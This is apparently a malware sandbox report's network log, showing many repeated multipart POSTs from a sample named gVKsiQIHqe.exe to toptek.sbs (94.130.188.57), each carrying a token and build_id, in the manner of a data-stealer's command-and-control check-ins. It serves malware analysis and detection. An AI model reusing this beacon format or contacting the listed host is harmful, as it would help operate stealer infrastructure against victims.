                                                                                                                                                                                                                                                                                    2024-12-23 05:58:39 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Z5P8GDTJM7G4E3O8Q1DBCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:40 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    63192.168.2.55004194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:41 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----4EK6XT2N7YCBAIEK6XT0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:41 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 34 45 4b 36 58 54 32 4e 37 59 43 42 41 49 45 4b 36 58 54 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------4EK6XT2N7YCBAIEK6XT0Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------4EK6XT2N7YCBAIEK6XT0Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    64192.168.2.55004294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:42 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:42 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------VKNG4E3OZMOZUAAASJ5PCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:43 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    65192.168.2.55004894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:44 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----58GD2V3OZMO8YMOZCJ5X
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:44 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 44 32 56 33 4f 5a 4d 4f 38 59 4d 4f 5a 43 4a 35 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------58GD2V3OZMO8YMOZCJ5XContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------58GD2V3OZMO8YMOZCJ5XCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:45 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    66192.168.2.55005194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:45 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS0HDT
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:45 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------YUAI5X4W47GV3EUS0HDTCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:46 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    67192.168.2.55005694.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:47 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FU3OPHVSJEKF37QQIMGV
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1825
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:47 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 46 55 33 4f 50 48 56 53 4a 45 4b 46 33 37 51 51 49 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 46 55 33 4f 50 48 56 53 4a 45 4b 46 33 37 51 51 49 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 55 33 4f 50 48 56 53 4a 45 4b 46 33 37 51 51 49 4d 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------FU3OPHVSJEKF37QQIMGVContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------FU3OPHVSJEKF37QQIMGVContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------FU3OPHVSJEKF37QQIMGVCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    68192.168.2.55006194.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:48 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----3EKNYUKXBA1NYU3OPHVS
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:48 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 33 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 33 45 4b 4e 59 55 4b 58 42 41 31 4e 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------3EKNYUKXBA1NYU3OPHVSContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------3EKNYUKXBA1NYU3OPHVSContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------3EKNYUKXBA1NYU3OPHVSCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:49 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    69192.168.2.55006894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:50 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:50 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------G47GDB16FUSRIMOPZCBICont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    70192.168.2.55006994.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:51 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----G47GDB16FUSRIMOPZCBI
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:51 UTC1841OUTData Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 44 42 31 36 46 55 53 52 49 4d 4f 50 5a 43 42 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------G47GDB16FUSRIMOPZCBIContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------G47GDB16FUSRIMOPZCBICont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    71192.168.2.55007594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:53 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----RQQ9RQIEU37QQQIWT2NG
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 1841
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
